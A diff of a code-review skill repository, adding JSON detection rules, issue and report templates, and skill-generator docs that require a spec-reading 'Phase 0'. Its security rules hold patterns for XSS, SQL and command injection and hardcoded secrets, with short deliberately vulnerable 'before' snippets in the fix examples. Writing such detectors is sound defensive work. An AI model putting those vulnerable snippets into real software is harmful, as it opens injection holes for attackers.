"id": "string", // Unique rule identifier
"category": "string", // Rule category within dimension
"severity": "critical|high|medium|low",
"pattern": "string", // Detection pattern
"patternType": "regex|includes|ast",
"negativePatterns": [], // Patterns that exclude matches
"caseInsensitive": false, // For regex patterns
"contextPattern": "", // Additional context requirement
"contextPath": [], // Path patterns for context
"lineThreshold": 0, // For size-based rules
"methodThreshold": 0, // For complexity rules
"description": "string", // Issue description
"recommendation": "string", // How to fix
"fixExample": "string" // Code example
}
]
}
```
## Dimension Summary
| Dimension | Prefix | Rules | Focus Areas |
|-----------|--------|-------|-------------|
| Correctness | CORR | 5 | Null checks, error handling, type safety |
| Security | SEC | 5 | XSS, injection, secrets, crypto |
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
| Readability | READ | 5 | Naming, length, nesting, magic values |
| Testing | TEST | 5 | Assertions, coverage, mock quality |
| Architecture | ARCH | 5 | Dependencies, layering, coupling |
## Severity Levels
| Severity | Description | Action |
|----------|-------------|--------|
| **critical** | Security vulnerability or data loss risk | Must fix before release |
| **high** | Bug or significant quality issue | Fix in current sprint |
| **medium** | Code smell or maintainability concern | Plan to address |
| **low** | Style or minor improvement | Address when convenient |
## Pattern Types
### regex
Standard regular expression pattern. Supports flags via `caseInsensitive`.
```json
{
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
"patternType": "regex"
}
```
### includes
Simple substring match. Faster than regex for literal strings.
```json
{
"pattern": "innerHTML",
"patternType": "includes"
}
```
### ast (Future)
AST-based detection for complex structural patterns.
```json
{
"pattern": "function[params>5]",
"patternType": "ast"
}
```
## Usage in Code
```javascript
// Load rules
const rules = JSON.parse(fs.readFileSync('correctness-rules.json'));
// Apply rules
for (const rule of rules.rules) {
const matches = detectByPattern(content, rule.pattern, rule.patternType);
for (const match of matches) {
// Check negative patterns
if (rule.negativePatterns?.some(np => match.context.includes(np))) {
continue;
}
findings.push({
id: `${rules.prefix}-${counter++}`,
severity: rule.severity,
category: rule.category,
description: rule.description,
recommendation: rule.recommendation,
fixExample: rule.fixExample
});
}
}
```
## Adding New Rules
1. Identify the appropriate dimension
2. Create rule with unique `id` within dimension
3. Choose appropriate `patternType`
4. Provide clear `description` and `recommendation`
5. Include practical `fixExample`
6. Test against sample code
## Rule Maintenance
- Review rules quarterly for relevance
- Update patterns as language/framework evolves
- Track false positive rates
- Collect feedback from users

View File

@@ -0,0 +1,59 @@
{
"dimension": "performance",
"prefix": "PERF",
"description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
"rules": [
{
"id": "nested-loops",
"category": "algorithm-complexity",
"severity": "medium",
"pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
"patternType": "regex",
"description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
"recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
"fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
},
{
"id": "array-in-loop",
"category": "inefficient-operation",
"severity": "high",
"pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
"patternType": "includes",
"contextPattern": "for|while|forEach|map|filter|reduce",
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
"recommendation": "Convert array to Set before the loop for O(1) lookups",
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
},
{
"id": "synchronous-io",
"category": "io-efficiency",
"severity": "high",
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
"patternType": "includes",
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
},
{
"id": "memory-leak-closure",
"category": "memory-leak",
"severity": "high",
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
"patternType": "regex",
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
"description": "Event listeners and timers without cleanup can cause memory leaks",
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
},
{
"id": "unnecessary-rerender",
"category": "react-performance",
"severity": "medium",
"pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
"patternType": "regex",
"description": "Creating new object/array references in useState can cause unnecessary re-renders",
"recommendation": "Use useMemo for computed values, useCallback for functions, or consider state management libraries",
"fixExample": "// Before - new object every render\nconst [config] = useState({ theme: 'dark' });\n\n// After - stable reference\nconst defaultConfig = useMemo(() => ({ theme: 'dark' }), []);\nconst [config] = useState(defaultConfig);"
}
]
}

View File

@@ -0,0 +1,60 @@
{
"dimension": "readability",
"prefix": "READ",
"description": "Rules for detecting code readability issues including naming, complexity, and documentation",
"rules": [
{
"id": "long-function",
"category": "function-length",
"severity": "medium",
"pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
"patternType": "regex",
"lineThreshold": 50,
"description": "Functions longer than 50 lines are difficult to understand and maintain",
"recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
"fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
},
{
"id": "single-letter-variable",
"category": "naming",
"severity": "low",
"pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
"patternType": "regex",
"negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
"description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
"recommendation": "Use descriptive names that convey the variable's purpose",
"fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
},
{
"id": "deep-nesting",
"category": "complexity",
"severity": "high",
"pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
"patternType": "regex",
"description": "Deeply nested code (4+ levels) is hard to follow and maintain",
"recommendation": "Use early returns, extract functions, or flatten conditionals",
"fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
},
{
"id": "magic-number",
"category": "magic-value",
"severity": "low",
"pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
"patternType": "regex",
"negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
"description": "Magic numbers without explanation make code hard to understand",
"recommendation": "Extract magic numbers into named constants with descriptive names",
"fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
},
{
"id": "commented-code",
"category": "dead-code",
"severity": "low",
"pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
"patternType": "regex",
"description": "Commented-out code adds noise and should be removed. Use version control for history",
"recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
"fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
}
]
}

View File

@@ -0,0 +1,58 @@
{
"dimension": "security",
"prefix": "SEC",
"description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
"rules": [
{
"id": "xss-innerHTML",
"category": "xss-risk",
"severity": "critical",
"pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
"patternType": "includes",
"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
},
{
"id": "hardcoded-secret",
"category": "hardcoded-secret",
"severity": "critical",
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
"patternType": "regex",
"caseInsensitive": true,
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
},
{
"id": "sql-injection",
"category": "injection",
"severity": "critical",
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
"patternType": "regex",
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
"recommendation": "Use parameterized queries or prepared statements with placeholders",
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
},
{
"id": "command-injection",
"category": "injection",
"severity": "critical",
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
"patternType": "regex",
"description": "Command execution with user input can lead to command injection attacks",
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
},
{
"id": "insecure-random",
"category": "cryptography",
"severity": "high",
"pattern": "Math\\.random\\(\\)",
"patternType": "includes",
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
}
]
}

View File

@@ -0,0 +1,59 @@
{
"dimension": "testing",
"prefix": "TEST",
"description": "Rules for detecting testing issues including coverage gaps, test quality, and mock usage",
"rules": [
{
"id": "missing-assertion",
"category": "test-quality",
"severity": "high",
"pattern": "(?:it|test)\\s*\\([^)]+,\\s*(?:async\\s*)?\\(\\)\\s*=>\\s*\\{[^}]*\\}\\s*\\)",
"patternType": "regex",
"negativePatterns": ["expect", "assert", "should", "toBe", "toEqual"],
"description": "Test case without assertions always passes and provides no value",
"recommendation": "Add assertions to verify expected behavior. Each test should have at least one meaningful assertion",
"fixExample": "// Before\nit('should process data', async () => {\n await processData(input);\n});\n\n// After\nit('should process data', async () => {\n const result = await processData(input);\n expect(result.success).toBe(true);\n expect(result.data).toHaveLength(3);\n});"
},
{
"id": "hardcoded-test-data",
"category": "test-maintainability",
"severity": "low",
"pattern": "expect\\s*\\([^)]+\\)\\.toBe\\s*\\(['\"][^'\"]{20,}['\"]\\)",
"patternType": "regex",
"description": "Long hardcoded strings in assertions are brittle and hard to maintain",
"recommendation": "Use snapshots for large outputs, or extract expected values to test fixtures",
"fixExample": "// Before\nexpect(result).toBe('very long expected string that is hard to maintain...');\n\n// After\nexpect(result).toMatchSnapshot();\n// or\nconst expected = loadFixture('expected-output.json');\nexpect(result).toEqual(expected);"
},
{
"id": "no-error-test",
"category": "coverage-gap",
"severity": "medium",
"pattern": "describe\\s*\\([^)]+",
"patternType": "regex",
"negativePatterns": ["throw", "reject", "error", "fail", "catch"],
"description": "Test suite may be missing error path testing. Error handling is critical for reliability",
"recommendation": "Add tests for error cases: invalid input, network failures, edge cases",
"fixExample": "// Add error path tests\nit('should throw on invalid input', () => {\n expect(() => processData(null)).toThrow('Invalid input');\n});\n\nit('should handle network failure', async () => {\n mockApi.mockRejectedValue(new Error('Network error'));\n await expect(fetchData()).rejects.toThrow('Network error');\n});"
},
{
"id": "test-implementation-detail",
"category": "test-quality",
"severity": "medium",
"pattern": "toHaveBeenCalledWith|toHaveBeenCalledTimes",
"patternType": "includes",
"description": "Testing implementation details (call counts, exact parameters) makes tests brittle to refactoring",
"recommendation": "Prefer testing observable behavior and outcomes over internal implementation",
"fixExample": "// Before - brittle\nexpect(mockService.process).toHaveBeenCalledTimes(3);\nexpect(mockService.process).toHaveBeenCalledWith('exact-arg');\n\n// After - behavior-focused\nexpect(result.items).toHaveLength(3);\nexpect(result.processed).toBe(true);"
},
{
"id": "skip-test",
"category": "test-coverage",
"severity": "high",
"pattern": "it\\.skip|test\\.skip|xit|xdescribe|describe\\.skip",
"patternType": "regex",
"description": "Skipped tests indicate untested code paths or broken functionality",
"recommendation": "Fix or remove skipped tests. If temporarily skipped, add TODO comment with issue reference",
"fixExample": "// Before\nit.skip('should handle edge case', () => { ... });\n\n// After - either fix it\nit('should handle edge case', () => {\n // fixed implementation\n});\n\n// Or document why skipped\n// TODO(#123): Re-enable after API migration\nit.skip('should handle edge case', () => { ... });"
}
]
}

View File

@@ -0,0 +1,186 @@
# Issue Template
问题记录模板。
## Single Issue Template
```markdown
#### {{severity_emoji}} [{{id}}] {{category}}
- **严重程度**: {{severity}}
- **维度**: {{dimension}}
- **文件**: `{{file}}`{{#if line}}:{{line}}{{/if}}
- **描述**: {{description}}
{{#if code_snippet}}
**问题代码**:
```{{language}}
{{code_snippet}}
```
{{/if}}
**建议**: {{recommendation}}
{{#if fix_example}}
**修复示例**:
```{{language}}
{{fix_example}}
```
{{/if}}
{{#if references}}
**参考资料**:
{{#each references}}
- {{this}}
{{/each}}
{{/if}}
```
## Issue Object Schema
```typescript
interface Issue {
id: string; // e.g., "SEC-001"
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
dimension: string; // e.g., "security"
category: string; // e.g., "xss-risk"
file: string; // e.g., "src/utils/render.ts"
line?: number; // e.g., 42
column?: number; // e.g., 15
code_snippet?: string;
description: string;
recommendation: string;
fix_example?: string;
references?: string[];
}
```
## ID Generation
```javascript
function generateIssueId(dimension, counter) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
const prefix = prefixes[dimension] || 'MISC';
const number = String(counter).padStart(3, '0');
return `${prefix}-${number}`;
}
```
## Severity Emojis
```javascript
const SEVERITY_EMOJI = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
```
## Issue Categories by Dimension
### Correctness
- `null-check` - 缺少空值检查
- `boundary` - 边界条件未处理
- `error-handling` - 错误处理不当
- `type-safety` - 类型安全问题
- `logic-error` - 逻辑错误
- `resource-leak` - 资源泄漏
### Security
- `injection` - 注入风险
- `xss` - 跨站脚本
- `hardcoded-secret` - 硬编码密钥
- `auth` - 认证授权
- `sensitive-data` - 敏感数据
### Performance
- `complexity` - 复杂度问题
- `n+1-query` - N+1 查询
- `memory-leak` - 内存泄漏
- `blocking-io` - 阻塞 I/O
- `inefficient-algorithm` - 低效算法
### Readability
- `naming` - 命名问题
- `function-length` - 函数过长
- `nesting-depth` - 嵌套过深
- `comments` - 注释问题
- `duplication` - 代码重复
### Testing
- `coverage` - 覆盖不足
- `boundary-test` - 缺少边界测试
- `test-isolation` - 测试不独立
- `flaky-test` - 不稳定测试
### Architecture
- `layer-violation` - 层次违规
- `circular-dependency` - 循环依赖
- `coupling` - 耦合过紧
- `srp-violation` - 单一职责违规
## Example Issues
### Critical Security Issue
```json
{
"id": "SEC-001",
"severity": "critical",
"dimension": "security",
"category": "xss",
"file": "src/components/Comment.tsx",
"line": 25,
"code_snippet": "element.innerHTML = userComment;",
"description": "直接使用 innerHTML 插入用户输入,存在 XSS 攻击风险",
"recommendation": "使用 textContent 或对用户输入进行 HTML 转义",
"fix_example": "element.textContent = userComment;\n// 或\nelement.innerHTML = DOMPurify.sanitize(userComment);",
"references": [
"https://owasp.org/www-community/xss-filter-evasion-cheatsheet"
]
}
```
### High Correctness Issue
```json
{
"id": "CORR-003",
"severity": "high",
"dimension": "correctness",
"category": "error-handling",
"file": "src/services/api.ts",
"line": 42,
"code_snippet": "try {\n await fetchData();\n} catch (e) {}",
"description": "空的 catch 块会静默吞掉错误,导致问题难以发现和调试",
"recommendation": "记录错误日志或重新抛出异常",
"fix_example": "try {\n await fetchData();\n} catch (e) {\n console.error('Failed to fetch data:', e);\n throw e;\n}"
}
```
### Medium Readability Issue
```json
{
"id": "READ-007",
"severity": "medium",
"dimension": "readability",
"category": "function-length",
"file": "src/utils/processor.ts",
"line": 15,
"description": "函数 processData 有 150 行,超过推荐的 50 行限制,难以理解和维护",
"recommendation": "将函数拆分为多个小函数,每个函数负责单一职责",
"fix_example": "// 拆分为:\nfunction validateInput(data) { ... }\nfunction transformData(data) { ... }\nfunction saveData(data) { ... }"
}
```

View File

@@ -0,0 +1,173 @@
# Review Report Template
审查报告模板。
## Template Structure
```markdown
# Code Review Report
## 审查概览
| 项目 | 值 |
|------|------|
| 目标路径 | `{{target_path}}` |
| 文件数量 | {{file_count}} |
| 代码行数 | {{total_lines}} |
| 主要语言 | {{language}} |
| 框架 | {{framework}} |
| 审查时间 | {{review_duration}} |
## 问题统计
| 严重程度 | 数量 |
|----------|------|
| 🔴 Critical | {{critical_count}} |
| 🟠 High | {{high_count}} |
| 🟡 Medium | {{medium_count}} |
| 🔵 Low | {{low_count}} |
| ⚪ Info | {{info_count}} |
| **总计** | **{{total_issues}}** |
### 按维度统计
| 维度 | 问题数 |
|------|--------|
| Correctness (正确性) | {{correctness_count}} |
| Security (安全性) | {{security_count}} |
| Performance (性能) | {{performance_count}} |
| Readability (可读性) | {{readability_count}} |
| Testing (测试) | {{testing_count}} |
| Architecture (架构) | {{architecture_count}} |
---
## 高风险区域
{{#if risk_areas}}
| 文件 | 原因 | 优先级 |
|------|------|--------|
{{#each risk_areas}}
| `{{this.file}}` | {{this.reason}} | {{this.priority}} |
{{/each}}
{{else}}
未发现明显的高风险区域。
{{/if}}
---
## 问题详情
{{#each dimensions}}
### {{this.name}}
{{#each this.findings}}
#### {{severity_emoji this.severity}} [{{this.id}}] {{this.category}}
- **严重程度**: {{this.severity}}
- **文件**: `{{this.file}}`{{#if this.line}}:{{this.line}}{{/if}}
- **描述**: {{this.description}}
{{#if this.code_snippet}}
```
{{this.code_snippet}}
```
{{/if}}
**建议**: {{this.recommendation}}
{{#if this.fix_example}}
**修复示例**:
```
{{this.fix_example}}
```
{{/if}}
---
{{/each}}
{{/each}}
## 审查建议
### 必须修复 (Must Fix)
{{must_fix_summary}}
### 建议改进 (Should Fix)
{{should_fix_summary}}
### 可选优化 (Nice to Have)
{{nice_to_have_summary}}
---
*报告生成时间: {{generated_at}}*
```
## Variable Definitions
| Variable | Type | Source |
|----------|------|--------|
| `{{target_path}}` | string | state.context.target_path |
| `{{file_count}}` | number | state.context.file_count |
| `{{total_lines}}` | number | state.context.total_lines |
| `{{language}}` | string | state.context.language |
| `{{framework}}` | string | state.context.framework |
| `{{review_duration}}` | string | Formatted duration |
| `{{critical_count}}` | number | Count of critical findings |
| `{{high_count}}` | number | Count of high findings |
| `{{medium_count}}` | number | Count of medium findings |
| `{{low_count}}` | number | Count of low findings |
| `{{info_count}}` | number | Count of info findings |
| `{{total_issues}}` | number | Total findings |
| `{{risk_areas}}` | array | state.scan_summary.risk_areas |
| `{{dimensions}}` | array | Grouped findings by dimension |
| `{{generated_at}}` | string | ISO timestamp |
## Helper Functions
```javascript
function severity_emoji(severity) {
const emojis = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
return emojis[severity] || '⚪';
}
function formatDuration(ms) {
const minutes = Math.floor(ms / 60000);
const seconds = Math.floor((ms % 60000) / 1000);
return `${minutes}${seconds}`;
}
function generateMustFixSummary(findings) {
const critical = findings.filter(f => f.severity === 'critical');
const high = findings.filter(f => f.severity === 'high');
if (critical.length + high.length === 0) {
return '未发现必须立即修复的问题。';
}
return `发现 ${critical.length} 个严重问题和 ${high.length} 个高优先级问题,建议在合并前修复。`;
}
```
## Usage Example
```javascript
const report = generateReport({
context: state.context,
summary: state.summary,
findings: state.findings,
scanSummary: state.scan_summary
});
Write(`${workDir}/review-report.md`, report);
```

View File

@@ -15,6 +15,9 @@ Meta-skill for creating new Claude Code skills with configurable execution modes
│ Skill Generator Architecture │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
│ Study SKILL-DESIGN-SPEC.md + 模板 │
│ ↓ │
│ Phase 1: Requirements → skill-config.json │
│ Discovery (name, type, mode, agents) │
│ ↓ │
@@ -82,10 +85,63 @@ Phase 01 → Phase 02 → Phase 03 → ... → Phase N
3. **规范遵循**: 严格遵循 `_shared/SKILL-DESIGN-SPEC.md`
4. **可扩展性**: 生成的 Skill 易于扩展和修改
---
## ⚠️ Mandatory Prerequisites (强制前置条件)
> **⛔ 禁止跳过**: 在执行任何生成操作之前,**必须**完整阅读以下文档。未阅读规范直接生成将导致输出不符合质量标准。
### 核心规范 (必读)
| Document | Purpose | Priority |
|----------|---------|----------|
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 - 定义所有 Skill 的结构、命名、质量标准 | **P0 - 最高** |
### 模板文件 (生成前必读)
| Document | Purpose |
|----------|---------|
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 入口文件模板 |
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
| [templates/code-analysis-action.md](templates/code-analysis-action.md) | 代码分析 Action 模板 |
| [templates/llm-action.md](templates/llm-action.md) | LLM Action 模板 |
| [templates/script-bash.md](templates/script-bash.md) | Bash 脚本模板 |
| [templates/script-python.md](templates/script-python.md) | Python 脚本模板 |
### 规范文档 (按需阅读)
| Document | Purpose |
|----------|---------|
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
| [specs/cli-integration.md](specs/cli-integration.md) | CLI 集成规范 |
| [specs/scripting-integration.md](specs/scripting-integration.md) | 脚本集成规范 |
### Phase 执行指南 (执行时参考)
| Document | Purpose |
|----------|---------|
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification Study (强制前置 - 禁止跳过) │
│ → Read: ../_shared/SKILL-DESIGN-SPEC.md (通用设计规范) │
│ → Read: templates/*.md (所有相关模板文件) │
│ → 理解: Skill 结构规范、命名约定、质量标准 │
│ → Output: 内化规范要求,确保后续生成符合标准 │
│ ⛔ 未完成 Phase 0 禁止进入 Phase 1 │
├─────────────────────────────────────────────────────────────────┤
│ Phase 1: Requirements Discovery │
│ → AskUserQuestion: Skill 名称、目标、执行模式 │
│ → Output: skill-config.json │
@@ -168,20 +224,3 @@ if (config.execution_mode === 'autonomous') {
├── orchestrator-base.md # 编排器模板
└── action-base.md # 动作模板
```
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 模板 |
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 |

View File

@@ -2,6 +2,16 @@
自主模式编排器的模板。
## ⚠️ 重要提示
> **Phase 0 是强制前置阶段**:在 Orchestrator 启动执行循环之前,必须先完成 Phase 0 的规范研读。
>
> 生成 Orchestrator 时,需要确保:
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
> 2. Orchestrator 启动前验证规范已阅读
> 3. 所有 Action 文件都引用相关的规范文档
> 4. Architecture Overview 中 Phase 0 位于 Orchestrator 之前
## 模板结构
```markdown

View File

@@ -2,6 +2,15 @@
顺序模式 Phase 文件的模板。
## ⚠️ 重要提示
> **Phase 0 是强制前置阶段**:在实现任何 Phase (1, 2, 3...) 之前,必须先完成 Phase 0 的规范研读。
>
> 生成 Sequential Phase 时,需要确保:
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
> 2. 每个 Phase 文件都引用相关的规范文档
> 3. 执行流程明确标注 Phase 0 为禁止跳过的前置步骤
## 模板结构
```markdown

View File

@@ -36,6 +36,16 @@ allowed-tools: {{allowed_tools}}
{{design_principles}}
---
## ⚠️ Mandatory Prerequisites (强制前置条件)
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。未阅读规范直接执行将导致输出不符合质量标准。
{{mandatory_prerequisites}}
---
## Execution Flow
{{execution_flow}}
@@ -71,9 +81,10 @@ Bash(\`mkdir -p "\${workDir}"\`);
| `{{description}}` | string | config.description |
| `{{triggers}}` | string | config.triggers.join(", ") |
| `{{allowed_tools}}` | string | config.allowed_tools.join(", ") |
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 |
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 (包含 Phase 0) |
| `{{design_principles}}` | string | 根据 execution_mode 生成 |
| `{{execution_flow}}` | string | 根据 phases/actions 生成 |
| `{{mandatory_prerequisites}}` | string | 强制前置阅读文档列表 (specs + templates) |
| `{{execution_flow}}` | string | 根据 phases/actions 生成 (Phase 0 在最前) |
| `{{output_location}}` | string | config.output.location |
| `{{additional_dirs}}` | string | 根据 execution_mode 生成 |
| `{{output_structure}}` | string | 根据配置生成 |
@@ -84,21 +95,48 @@ Bash(\`mkdir -p "\${workDir}"\`);
```javascript
function generateSkillMd(config) {
const template = Read('templates/skill-md.md');
return template
.replace(/\{\{skill_name\}\}/g, config.skill_name)
.replace(/\{\{display_name\}\}/g, config.display_name)
.replace(/\{\{description\}\}/g, config.description)
.replace(/\{\{triggers\}\}/g, config.triggers.map(t => `"${t}"`).join(", "))
.replace(/\{\{allowed_tools\}\}/g, config.allowed_tools.join(", "))
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config))
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config)) // 包含 Phase 0
.replace(/\{\{design_principles\}\}/g, generatePrinciples(config))
.replace(/\{\{execution_flow\}\}/g, generateFlow(config))
.replace(/\{\{mandatory_prerequisites\}\}/g, generatePrerequisites(config)) // 强制前置条件
.replace(/\{\{execution_flow\}\}/g, generateFlow(config)) // Phase 0 在最前
.replace(/\{\{output_location\}\}/g, config.output.location)
.replace(/\{\{additional_dirs\}\}/g, generateAdditionalDirs(config))
.replace(/\{\{output_structure\}\}/g, generateOutputStructure(config))
.replace(/\{\{reference_table\}\}/g, generateReferenceTable(config));
}
// 生成强制前置条件表格
function generatePrerequisites(config) {
const specs = config.specs || [];
const templates = config.templates || [];
let result = '### 规范文档 (必读)\n\n';
result += '| Document | Purpose | Priority |\n';
result += '|----------|---------|----------|\n';
specs.forEach((spec, index) => {
const priority = index === 0 ? '**P0 - 最高**' : 'P1';
result += `| [${spec.path}](${spec.path}) | ${spec.purpose} | ${priority} |\n`;
});
if (templates.length > 0) {
result += '\n### 模板文件 (生成前必读)\n\n';
result += '| Document | Purpose |\n';
result += '|----------|---------|\n';
templates.forEach(tmpl => {
result += `| [${tmpl.path}](${tmpl.path}) | ${tmpl.purpose} |\n`;
});
}
return result;
}
```
## Sequential 模式示例
@@ -118,6 +156,9 @@ Generate API documentation from source code.
\`\`\`
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
│ Study │
│ ↓ │
│ Phase 1: Scanning → endpoints.json │
│ ↓ │
│ Phase 2: Parsing → schemas.json │
